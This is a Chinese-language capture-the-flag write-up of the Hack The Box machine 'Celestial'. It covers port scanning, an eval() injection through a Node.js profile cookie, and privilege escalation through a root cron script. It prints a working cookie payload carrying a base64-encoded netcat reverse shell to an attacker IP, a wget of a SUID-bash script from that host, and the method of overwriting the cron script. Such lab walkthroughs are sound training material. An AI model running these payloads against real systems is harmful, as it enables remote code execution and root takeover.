端口扫描

┌──(mikannse㉿kali)-[~/HTB/celestial]
└─$ sudo nmap --min-rate=10000 -p- 10.10.10.85
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-16 11:40 CST
Nmap scan report for 10.10.10.85
Host is up (0.074s latency).
Not shown: 64359 closed tcp ports (reset), 1175 filtered tcp ports (no-response)
PORT     STATE SERVICE
3000/tcp open  ppp

Nmap done: 1 IP address (1 host up) scanned in 12.83 seconds
┌──(mikannse㉿kali)-[~/HTB/celestial]
└─$ sudo nmap -sT -sC -sV -O -p3000 10.10.10.85
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-16 11:41 CST
Nmap scan report for 10.10.10.85
Host is up (0.072s latency).

PORT     STATE SERVICE VERSION
3000/tcp open  http    Node.js Express framework
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.12 (96%), Linux 3.13 (96%), Linux 3.16 (96%), Linux 3.2 - 4.9 (96%), Linux 3.8 - 3.11 (96%), Linux 4.8 (96%), Linux 4.4 (95%), Linux 4.9 (95%), Linux 3.18 (95%), Linux 4.2 (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.11 seconds

Web

扫描结果得知是一个express框架,进去之后页面只有一行”Hey Dummy 2 + 2 is 22”

扫目录也没有什么别的结果,但是有一个叫做profile的cookie,进行url解码和base64解码之后得到

{“username”:”Dummy”,”country”:”Idk Probably Somewhere Dumb”,”city”:”Lametown”,”num”:”2”}

当我把”2”改成”1”时,页面的内容变成了:Hey Dummy 1 + 1 is 11

一开始认为是PUG模板注入,但是当注入#{7*7}时,页面报了错,当随便输入一串非数字字符串时,报错又改变了:

ReferenceError: awfawgwagawfawgwag is not defined
    at eval (eval at <anonymous> (/home/sun/server.js:13:29), <anonymous>:1:1)
    at /home/sun/server.js:13:16
    at Layer.handle [as handle_request] (/home/sun/node_modules/express/lib/router/layer.js:95:5)
    at next (/home/sun/node_modules/express/lib/router/route.js:137:13)
    at Route.dispatch (/home/sun/node_modules/express/lib/router/route.js:112:3)
    at Layer.handle [as handle_request] (/home/sun/node_modules/express/lib/router/layer.js:95:5)
    at /home/sun/node_modules/express/lib/router/index.js:281:22
    at Function.process_params (/home/sun/node_modules/express/lib/router/index.js:335:12)
    at next (/home/sun/node_modules/express/lib/router/index.js:275:10)
    at cookieParser (/home/sun/node_modules/cookie-parser/index.js:70:5)

传入的num会被eval函数执行,那么尝试构造进行RCE,那么构造一串反弹shell,然后base64编码加url,像是:

{"username":"hack","country":"Idk Probably Somewhere Dumb","city":"Lametown","num":"require('child_process').execSync('echo cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL2Jhc2ggLWkgMj4mMXxuYyAxMC4xMC4xNC43IDQ0MyA+L3RtcC9m | base64 -d | bash').toString();"}

成功拿到shell!

提权

枚举了一下没别的东西,上pspy,需要运行几分钟才能得到有用的结果

2024/09/16 00:45:01 CMD: UID=0     PID=7405   | /bin/sh -c python /home/sun/Documents/script.py > /home/sun/output.txt; cp /root/script.py /home/sun/Documents/script.py; chown sun:sun /home/sun/Documents/script.py; chattr -i /home/sun/Documents/script.py; touch -d "$(date -R -r /home/sun/Documents/user.txt)" /home/sun/Documents/script.py

一个想法是写一个data指令来劫持环境变量

┌──(mikannse㉿kali)-[~/HTB/celestial]
└─$ cat data                                 
#!/bin/bash
cp /bin/bash /tmp/root_bash;chmod +xs /tmp/root_bash
sun@celestial:~/Documents$ wget http://10.10.14.7:8000/data
wget http://10.10.14.7:8000/data
--2024-09-16 01:01:35--  http://10.10.14.7:8000/data
Connecting to 10.10.14.7:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 65 [application/octet-stream]
Saving to: 'data'

data                100%[===================>]      65  --.-KB/s    in 0s      

2024-09-16 01:01:35 (21.5 MB/s) - 'data' saved [65/65]

sun@celestial:~/Documents$ chmod +x data
chmod +x data
sun@celestial:~/Documents$ export PATH=/home/sun/Documents:$PATH
export PATH=/home/sun/Documents:$PATH

但是失败了,那么尝试更改script.py文件,写一个反弹shell,成功!

碎碎念

挺简单的房间,都是遇到过的东西,而且思路很清晰